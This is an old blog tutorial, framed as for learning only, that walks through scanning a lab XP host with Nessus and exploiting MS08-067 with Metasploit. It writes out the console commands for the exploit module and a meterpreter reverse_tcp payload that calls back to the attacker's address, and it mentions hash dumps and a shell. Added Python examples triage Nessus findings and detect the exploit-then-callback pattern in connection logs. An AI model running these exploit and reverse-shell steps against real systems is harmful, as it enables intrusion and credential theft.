Tuesday, 15 May 2012

Metasploit Tutorial

We have all seen movies like Hackers, etc., and we have all imagined becoming the one from the movies.
So, taking a step forward towards this dream, I am giving a small tutorial on Metasploit. I will be using the term msf instead of Metasploit.
For those who don't know what msf is and have always been fascinated by black and green screens, here is how it is done.

I am going to use NESSUS for vulnerability scanning, and the rest of the work will be done by msf. Also, I will be using the msf console because it gives better control over the msf framework and a faster response; using the console has one more added advantage, i.e. it gives the geeky look which we all have a mindset is very hi-fi.
Cutting all the discussion, coming directly to the topic.

So, how to do it: I will describe this in steps for better understanding. For this purpose I have used two systems which I have connected via WAN; the host OS does not matter, and the victim has XP installed on it.


Basic commands to be known:
1. Searching for anything: "search name"
2. Set the exploit: "use exploit_name"
3. Set the payload: "set payload payload_name"
4. See info: "info name"



STEP 1:
First, instead of using nmap for port scanning, we have used Nessus for vulnerability scanning; Nessus has one more added advantage of giving each vulnerability a number, which helps in msf to search for the proper exploit.
So, first we will scan the target.


In the above scan you can see how good Nessus is at giving information about the level of each vulnerability.
After analysing the report, we see 5 high vulnerabilities, so clicking on the first one, let's see its details:


We can see lots of info about the vulnerability. The vulnerability here is a service flaw on port 445 which has been given the number MS08-067; this number is going to be of great help later.
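The same triage can be done without clicking through the Nessus UI: the .nessus export is XML, and the bulletin number the tutorial relies on (MS08-067) sits in the plugin title and in an xref. The script below is an added example, not part of the original tutorial or of Nessus; the XML is a constructed, trimmed sample modelled on the .nessus v2 layout (NessusClientData_v2 > Report > ReportHost > ReportItem), and the plugin IDs in it are made-up values. From a defender's side this answers the useful question directly: which hosts are still missing which Microsoft bulletin.

```python
"""Triage a Nessus (.nessus v2) export: keep the high-severity findings and
pull out the Microsoft bulletin ID (e.g. MS08-067) each one references.

Added example, not part of the original tutorial. SAMPLE_NESSUS is a
constructed, trimmed report; plugin IDs are fake placeholder values.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample: one XP host with a high-severity SMB finding (port 445)
# and an informational item that should not be reported.
SAMPLE_NESSUS = """<?xml version="1.0"?>
<NessusClientData_v2>
  <Report name="lab-scan">
    <ReportHost name="192.168.1.5">
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="3"
                  pluginID="900001"
                  pluginName="MS08-067: Windows Server Service RPC request handling remote code execution">
        <xref>MSFT:MS08-067</xref>
        <solution>Apply the vendor patch for this bulletin.</solution>
      </ReportItem>
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
                  pluginID="900002" pluginName="Scan information">
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""

SEVERITY_NAMES = {0: "info", 1: "low", 2: "medium", 3: "high", 4: "critical"}
MS_BULLETIN_RE = re.compile(r"\bMS\d{2}-\d{3}\b")


def parse_findings(nessus_xml, min_severity=3):
    """Return findings (dicts) at or above min_severity, highest severity first."""
    root = ET.fromstring(nessus_xml)
    findings = []
    for host in root.iter("ReportHost"):
        host_ip = host.get("name", "")
        for item in host.iter("ReportItem"):
            sev = int(item.get("severity", "0"))
            if sev < min_severity:
                continue
            name = item.get("pluginName", "")
            # The bulletin ID may sit in the title or in an xref such as MSFT:MS08-067.
            refs = [x.text for x in item.findall("xref") if x.text]
            match = MS_BULLETIN_RE.search(" ".join([name] + refs))
            findings.append({
                "host": host_ip,
                "port": int(item.get("port", "0")),
                "service": item.get("svc_name", ""),
                "severity": sev,
                "severity_name": SEVERITY_NAMES.get(sev, str(sev)),
                "bulletin": match.group(0) if match else None,
                "plugin": name,
            })
    findings.sort(key=lambda f: (-f["severity"], f["host"], f["port"]))
    return findings


def hosts_missing_bulletin(findings, bulletin):
    """Set of hosts on which Nessus flagged the given bulletin as unpatched."""
    return {f["host"] for f in findings if f["bulletin"] == bulletin}


if __name__ == "__main__":
    for f in parse_findings(SAMPLE_NESSUS):
        print(f"{f['host']}:{f['port']}/{f['service']} {f['severity_name']:8} {f['bulletin']}  {f['plugin']}")
    print("needs MS08-067:", sorted(hosts_missing_bulletin(parse_findings(SAMPLE_NESSUS), "MS08-067")))
```

On a real export, point ET.parse at the .nessus file instead of the embedded string; the severity scale (0 to 4) and the MSFT: xref prefix are the conventions I am assuming, so check them against your Nessus version before trusting the output.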


STEP 2:
In msf, we are going to search for the proper exploit which can exploit this vulnerability. To make our search easier we are going to type search number (here, search ms08-067). Voila, what we have got is the exact name of the exploit. But in other cases, where you don't know the number or ID, we can also search by giving various parameters like the name, e.g. search name, etc. Then we have to choose the best one among the results by comparing all their requirements and how they work.


Now, since here we have got the exact exploit, we are going to use this exploit.
The command used for it:
use exploit_name, e.g. use windows/smb/ms08_067_netapi
We will check the various parameters by typing: info windows/smb/ms08_067_netapi


STEP 3:
Now it's time to set the victim's IP address, i.e. RHOST; RPORT is already set to 445.


Command to set RHOST: setg RHOST 192.168.1.5
Note:
(192.168.1.5 is the IP address of my PC on the local network which I am going to attack)


STEP 4:
After setting the exploit, now it's time to set the payload, so the main question arises: which payload to use now?
The options for this question can be narrowed down by typing show payloads, which gives the list of payloads that are compatible with that exploit.
From that list we are going to select a payload; I prefer meterpreter/reverse_tcp.


To use this payload, type the command: set payload windows/meterpreter/reverse_tcp


So, I will check its parameters, i.e. LHOST, LPORT, etc. To check them, we type info windows/meterpreter/reverse_tcp




Now here we have to change LHOST; LHOST refers to the IP address of the attacker, i.e. mine.
So to set the LHOST we do: setg LHOST 192.168.1.10




All done, we are now ready to exploit.


STEP 5:
Finally we type exploit. Voila... the attack is successful and a session is created.


Now, what to do next? Just type the command help and you will get a list of commands like kill process, shutdown, hash dumps, but I like shell because it gives you full command line control of the system, which you can see in the above picture.
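Seen from the victim's network, steps 3 to 5 leave a distinctive trace: the attacker's LHOST connects inbound to the victim's RHOST on tcp/445, and seconds later the victim opens a brand-new outbound connection back to that same peer, which is what a reverse_tcp payload does. The script below is an added detection example, not part of the original tutorial or of Metasploit; the connection log lines are constructed in a simple "timestamp src:sport -> dst:dport" format (4444 in them is the framework's default LPORT, but the logic deliberately matches any callback port), so the parser needs adapting to whatever your firewall or flow export actually emits.

```python
"""Hunt for the exploit-then-callback pattern in connection logs: an inbound
connection to SMB (tcp/445) on a host, followed within a short window by that
host initiating an outbound connection back to the same peer.

Added example, not part of the original tutorial. SAMPLE_LOG is constructed;
the "timestamp src:sport -> dst:dport" format is an assumption.
"""
from datetime import datetime, timedelta

# Constructed log. First block: attacker hits SMB twice, victim calls back two
# seconds later (reverse_tcp to the default listener port 4444). Second block:
# a workstation opens a file share and, 25 minutes later, the server happens
# to browse to it, which must not be flagged.
SAMPLE_LOG = """\
2012-05-15T10:00:01 192.168.1.10:51234 -> 192.168.1.5:445
2012-05-15T10:00:02 192.168.1.10:51235 -> 192.168.1.5:445
2012-05-15T10:00:04 192.168.1.5:1037 -> 192.168.1.10:4444
2012-05-15T10:05:00 192.168.1.20:49152 -> 192.168.1.5:445
2012-05-15T10:30:00 192.168.1.5:1040 -> 192.168.1.20:80
"""


def parse_log(text):
    """Parse lines into (timestamp, src_ip, dst_ip, dst_port) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, _arrow, dst = line.split()
        src_ip, _sport = src.rsplit(":", 1)
        dst_ip, dport = dst.rsplit(":", 1)
        events.append((datetime.fromisoformat(ts), src_ip, dst_ip, int(dport)))
    return events


def find_callbacks(events, trigger_port=445, window_seconds=60):
    """Return one alert dict per outbound connection that follows an inbound
    hit on trigger_port from the same peer within window_seconds."""
    last_trigger = {}  # (peer, victim) -> time of the latest hit on trigger_port
    alerts = []
    for ts, src_ip, dst_ip, dport in sorted(events):
        if dport == trigger_port:
            last_trigger[(src_ip, dst_ip)] = ts
            continue
        # src_ip is now the initiator; was it recently targeted by dst_ip?
        hit = last_trigger.get((dst_ip, src_ip))
        if hit is not None and ts - hit <= timedelta(seconds=window_seconds):
            alerts.append({
                "victim": src_ip,
                "peer": dst_ip,
                "trigger_at": hit,
                "callback_at": ts,
                "callback_port": dport,
            })
    return alerts


if __name__ == "__main__":
    for a in find_callbacks(parse_log(SAMPLE_LOG)):
        print(f"ALERT {a['victim']} called back to {a['peer']}:{a['callback_port']} "
              f"{(a['callback_at'] - a['trigger_at']).seconds}s after being hit on tcp/445")
```

The 60-second window is a tuning knob: too wide and ordinary SMB-then-HTTP traffic between servers starts to alert, as the second block in the sample shows. The durable fix for this particular finding is of course the patch Nessus pointed at, plus not exposing tcp/445 to networks that have no business reaching it.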




Special Thanks: ICW, AH guys and b0nd bro for their help in learning.




NOTE:
1. This tutorial is only for learning purposes; the author is not responsible for any illegal use.
2. Any use of this tutorial should be done at your own risk.
